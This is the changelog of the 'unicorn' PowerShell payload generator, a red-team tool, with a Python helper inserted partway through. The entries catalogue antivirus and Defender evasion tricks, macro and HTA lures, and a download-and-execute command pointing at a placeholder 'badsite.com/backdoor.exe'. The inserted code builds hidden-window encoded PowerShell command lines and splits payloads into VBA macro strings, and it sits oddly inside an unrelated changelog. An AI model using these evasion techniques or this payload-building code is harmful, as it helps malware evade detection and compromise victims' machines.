CHANGELOG.txt (forked from trustedsec/unicorn)
~~~~~~~~~~~~~~~~
version 3.2.5
~~~~~~~~~~~~~~~~
* add byte splitting based on defender sigs
~~~~~~~~~~~~~~~~
version 3.2.4
~~~~~~~~~~~~~~~~
* added randomized integer lengths for dynamic byte ranges
~~~~~~~~~~~~~~~~
version 3.2.3
~~~~~~~~~~~~~~~~
* create longer byte arrays for defender rule bypass
~~~~~~~~~~~~~~~~
version 3.2.2
~~~~~~~~~~~~~~~~
* add python 3 compatibility
* remove filewrite variable and move to function write_file for SettingContent-ms
~~~~~~~~~~~~~~~~
version 3.2.1
~~~~~~~~~~~~~~~~
* update blog post and update readme
* updated the unicorn Metasploit Meterpreter payload to remove the CLD instruction at the beginning of the shellcode, which Defender was signaturing on
~~~~~~~~~~~~~~~~
version 3.2
~~~~~~~~~~~~~~~~
* added new SettingContent-ms attack vector (from enigma0x3) to unicorn; supports Cobalt Strike, Metasploit, and custom shellcode
* removed %windir% from the command line - it was getting flagged by AV
~~~~~~~~~~~~~~~~
version 3.1
~~~~~~~~~~~~~~~~
* added secondary parse for older versions of cobalt strike
* added better error handling around list index out of range
* lowered the stack size because PowerShell sometimes crashed; seems to be more stable now
~~~~~~~~~~~~~~~~
version 3.0
~~~~~~~~~~~~~~~~
* added ability to import cobalt strike C# stager and use that as a unicorn based attack
* added ability to import any shellcode directly into unicorn
* removed the cmd.exe dependency from the WScript.Shell invocation - not needed, and dropping it leaves more room under the command line length limit
* added ability to use custom shellcode with cobalt strike and shellcode methods for hta
* added ability to use custom shellcode with cobalt strike and shellcode methods for macro
* fixed line continuation error for long payloads when using Excel (VBA allows at most 25 physical lines per logical line, so a long string cannot be joined with & and _ indefinitely and must be split across statements)
* add hiding of powershell name in hta file
~~~~~~~~~~~~~~~~
version 2.14
~~~~~~~~~~~~~~~~
* fix replace for /C that broke syntax for macros
~~~~~~~~~~~~~~~~
version 2.13
~~~~~~~~~~~~~~~~
* added switches on command lines for evasion
~~~~~~~~~~~~~~~~
version 2.12
~~~~~~~~~~~~~~~~
* added better handling for stack size detection on signatures - should no longer get flagged
~~~~~~~~~~~~~~~~
version 2.11
~~~~~~~~~~~~~~~~
* reduce filesize by removing shikata from encoding on payload generation
* added a description of the length limit to the size error message
~~~~~~~~~~~~~~~~
version 2.10
~~~~~~~~~~~~~~~~
* added IEX and formula evasion as DDE methods and split out attack vector into 3 different components
* rewrote the download/exec payload so that it is custom shellcode that is manually patched with URL instead of metasploit one
* numerous other enhancements and fixes
~~~~~~~~~~~~~~~~
version 2.9.3
~~~~~~~~~~~~~~~~
* added better obfuscation on DDE
~~~~~~~~~~~~~~~~
version 2.9.2
~~~~~~~~~~~~~~~~
* fixed compatibility with Windows 7 - for some reason -e''c breaks unicorn on Windows 7 whereas it works fine on Windows 10
~~~~~~~~~~~~~~~~
version 2.9.1
~~~~~~~~~~~~~~~~
* fix typo in powershell_command
* added better obfuscation of path and code (thanks Will)
~~~~~~~~~~~~~~~~
version 2.9
~~~~~~~~~~~~~~~~
* added a sys.exit() on length amount
* added new dde code exec through unicorn from sensepost
* fixed some wording in help menu
* general code cleanup
* slimmed down the command line some more by reducing separators and variable name length
~~~~~~~~~~~~~~~~
version 2.8.2
~~~~~~~~~~~~~~~~
* added better handling of randomized variable names
* removed an extra semicolon
* fixed typo
* added a length count for the payload to ensure the command never exceeds cmd.exe's maximum command line length of 8191 characters
* fixed minor casing on Start-Sleep
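The two length limits mentioned in this changelog (the 8191 character cmd.exe limit in the v2.8.2 entry above, and the 25 physical lines per VBA statement that the v3.0 Excel fix works around) are easy to get wrong silently: cmd.exe truncates, and the VBA editor refuses the macro with "Too many line continuations". The following is an added example, not unicorn's own code, showing both checks together: it builds a PowerShell -EncodedCommand one-liner and refuses to emit one over the limit, and it splits a long string into VBA statements that each stay within 25 physical lines. The function names, the 200 character chunk size, the PS_PREFIX string and the sample payloads are assumptions made for this illustration.

```python
"""Length guards for cmd.exe one-liners and VBA string concatenation.

Added example, not part of unicorn. Constants below are the documented
Windows/VBA limits; chunk size, prefix and function names are assumed.
"""
import base64
import re

CMD_MAX_LEN = 8191           # cmd.exe command line limit
VBA_MAX_PHYSICAL_LINES = 25  # first line + 24 "_" continuations
VBA_CHUNK = 200              # chars per string literal (assumed; keeps each
                             # physical line well under VBA's 1023 char limit)
PS_PREFIX = "powershell -nop -w 1 -enc "  # -w 1 == -WindowStyle Hidden (assumed prefix)


def encoded_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command_line(cmdline: str) -> str:
    """Inverse of build_command_line, used to verify the round trip."""
    return base64.b64decode(cmdline.rsplit(" ", 1)[1]).decode("utf-16-le")


def check_command_length(cmdline: str) -> int:
    """Return the length, or raise if cmd.exe would truncate the line."""
    if len(cmdline) > CMD_MAX_LEN:
        raise ValueError(
            f"command line is {len(cmdline)} chars; cmd.exe limit is {CMD_MAX_LEN}")
    return len(cmdline)


def build_command_line(script: str, prefix: str = PS_PREFIX) -> str:
    """Build the one-liner and refuse to emit one that exceeds the limit."""
    cmdline = prefix + encoded_command(script)
    check_command_length(cmdline)
    return cmdline


def vba_string_statements(var: str, payload: str, chunk: int = VBA_CHUNK,
                          max_lines: int = VBA_MAX_PHYSICAL_LINES) -> list:
    """Split payload into VBA statements, each at most max_lines physical lines.

    First statement:   var = "..." & _
                           "..."
    Later statements:  var = var & "..." & _
                           "..."
    """
    if '"' in payload:
        raise ValueError("payload must not contain double quotes")
    pieces = [payload[i:i + chunk] for i in range(0, len(payload), chunk)]
    statements = []
    for start in range(0, len(pieces), max_lines):
        group = pieces[start:start + max_lines]
        head = f"{var} = " if not statements else f"{var} = {var} & "
        lines = []
        for idx, piece in enumerate(group):
            line = (head if idx == 0 else "    ") + f'"{piece}"'
            if idx < len(group) - 1:
                line += " & _"      # VBA line continuation
            lines.append(line)
        statements.append("\n".join(lines))
    return statements


def physical_lines(statement: str) -> int:
    """Physical lines the VBA editor sees for one logical statement."""
    return statement.count("\n") + 1


def reassemble(statements: list) -> str:
    """Concatenate the string literals back, to check nothing was lost."""
    return "".join(re.findall(r'"([^"]*)"', "\n".join(statements)))


if __name__ == "__main__":
    cmd = build_command_line("Start-Sleep -s 1")   # constructed sample script
    print(len(cmd), cmd)
    for stmt in vba_string_statements("p", encoded_command("x" * 3000)):
        print(physical_lines(stmt), "physical lines")
```

The VBA splitter keeps every statement at or below 25 physical lines and then appends with `var = var & ...`, which is the same shape the Excel fix in v3.0 needed; the base64 alphabet contains no double quotes, so the literals need no escaping.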
~~~~~~~~~~~~~~~~
version 2.8.1
~~~~~~~~~~~~~~~~
* remove static variables - flagged by A/V
~~~~~~~~~~~~~~~~
version 2.8
~~~~~~~~~~~~~~~~
* shortens length and obfuscation of unicorn command
* removed direct -ec from powershell command
~~~~~~~~~~~~~~~~
version 2.7.5
~~~~~~~~~~~~~~~~
* fix missing powershell call (thanks matterpreter)
* improved additional wording on error message for macros
~~~~~~~~~~~~~~~~
version 2.7.4
~~~~~~~~~~~~~~~~
* added a more realistic "file corrupted" message for Excel macro injection
~~~~~~~~~~~~~~~~
version 2.7.3
~~~~~~~~~~~~~~~~
* fixed powershell injection obfuscation in macro injection - that was a pain :P
* added a bold red note on the AutoOpen/Auto_Open difference, selected by Office version number
* fixed powershell injection length issues by skimming down the chunking of powershell commands
~~~~~~~~~~~~~~~~
version 2.7.2
~~~~~~~~~~~~~~~~
* random cleanup
~~~~~~~~~~~~~~~~
version 2.7.1
~~~~~~~~~~~~~~~~
* fixed merge issue
~~~~~~~~~~~~~~~~
version 2.7
~~~~~~~~~~~~~~~~
* added description to macro attack for AutoOpen/Auto_Open()
* added obfuscation for actual base64 encoded strings
* added better randomization on variable names
~~~~~~~~~~~~~~~~
version 2.6
~~~~~~~~~~~~~~~~
* fixed an issue when generating hta if a folder was there it would not remove properly and overwrite
* fixed a bug introduced by new obfuscation on proper escaping of quotes
* added new obfuscation around HTA, variable names and split up shell commands to evade detection
* improved code base for HTA attack vector and reliability
~~~~~~~~~~~~~~~~
version 2.5.1
~~~~~~~~~~~~~~~~
* minor string format cleanup
* pep8 formatting
~~~~~~~~~~~~~~~~
version 2.5
~~~~~~~~~~~~~~~~
* complete overhaul of macro injection - adds heavy obfuscation throughout the entire codebase
* changed generate_random_strings to omit digits - VBA identifiers cannot start with a digit, so randomized macro variable names must be letters only
* code improvements and efficiency in vba code
~~~~~~~~~~~~~~~~
version 2.4.3
~~~~~~~~~~~~~~~~
* fixed macro injection with new obfuscated method
* added noprofile to command when using macro injection
* changed AutoOpen to Auto_Open
* fixed instructions to reflect
~~~~~~~~~~~~~~~~
version 2.4.2
~~~~~~~~~~~~~~~~
* shortened -window hidden to -w 1, which is shorthand for -WindowStyle Hidden
~~~~~~~~~~~~~~~~
version 2.4.1
~~~~~~~~~~~~~~~~
* added shortened method for obfuscation
~~~~~~~~~~~~~~~~
version 2.4
~~~~~~~~~~~~~~~~
* added better handling if msf or shellcode didn't get formatted properly
* added a new obfuscation technique that should no longer get picked up and removes the need for -e or -ec
~~~~~~~~~~~~~~~~
version 2.3.5
~~~~~~~~~~~~~~~~
* added better evasion on encodedcommand
~~~~~~~~~~~~~~~~
version 2.3.4
~~~~~~~~~~~~~~~~
* added decoded base64 -encodedcommand for better av evasion
~~~~~~~~~~~~~~~~
version 2.3.3
~~~~~~~~~~~~~~~~
* most AVs were flagging on -enc (rather than -EncodedCommand), and -enc together with a base64 string would also trigger Windows Defender; this change gets around it for both the macro and the standard ps1/encoded command parameters
~~~~~~~~~~~~~~~~
version 2.3.2
~~~~~~~~~~~~~~~~
* changed auto_open to AutoOpen() - thanks @JAshton
~~~~~~~~~~~~~~~~
version 2.3.1
~~~~~~~~~~~~~~~~
* fix indent issue
~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~
* added support for windows/download_exec as a payload option - just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe - note it doesn't need to be an exe, whatever you want to download and execute
* fixes an issue that caused macro injection to not properly work (duplicate powershell command)
~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~
* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but its better than before) - AV picking up on variables and base64 encoded strings
~~~~~~~~~~~~~~~~
version 2.1.2
~~~~~~~~~~~~~~~~
* added enablestageencoding to true by default
~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~
* added --smallest flag to msfvenom generate which compacts shellcode to smaller size
~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~
* added ability to import your own powershell into attacks (thanks to curi0usJack pull request)
* fixed an issue when generating macro attack with appropriate spacing on macros
~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~
* added brand new hta attack vector for direct web application compromise (thanks Justin Elze)
* added brand new attack binary to cert (thanks Matthew Graeber)
* added window.close(); after script
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* slimmed down powershell injection code even more
* when using windows/meterpreter/reverse_https, the options StagerURILength=5 and StagerVerifySSLCert=false are set in order to trim the payload; this is due to the character limit when pasting into a command window, and with these two settings the command shrinks significantly and fits within the normal length
* added support for shikata ga nai to obfuscate shellcode prior to UTF-16 and base64 encoding; this now throws off signatures when the payload is contained inside a file
~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~
* fixed an issue where powershell injection may not work on 32 bit platforms
* shaved command line argument down around 32 bytes
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~
* fixed autoopen from not working on some office implementations - now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload
~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
* incorporated new macro attack from Rik van Duijn RCX @rikduijn
* code cleanup and fixed an issue that would not present argument values when not formatted properly
* channeled stderr to subprocess.PIPE
* slimmed unicorn powershell injection code about 17 bytes to compact powershell injection
~~~~~~~~~~~~~~~~
version 0.5
~~~~~~~~~~~~~~~~
* fixed hidden window command when using powershell injection
~~~~~~~~~~~~~~~~
version 0.4
~~~~~~~~~~~~~~~~
* shortened powershell injection code by removing un-used code and shortening initial command names
* removed EnableStageEncoding - after testing extensively, this can produce unreliable results.
* fixed a bug that caused unicorn to not work properly due to changes with MSFVenom
* slimmed encoded powershell command, removed un-used else statement
~~~~~~~~~~~~~~~~
version 0.3
~~~~~~~~~~~~~~~~
* updated msfvenom to include format type and architecture to remove bug it would not generate appropriate shellcode
~~~~~~~~~~~~~~~~
version 0.2
~~~~~~~~~~~~~~~~
* changed output name
* added appropriate licensing
* slimmed the powershell code and added noprofile to downgrade process
~~~~~~~~~~~~~~~~
version 0.1
~~~~~~~~~~~~~~~~
* initial release of magic unicorn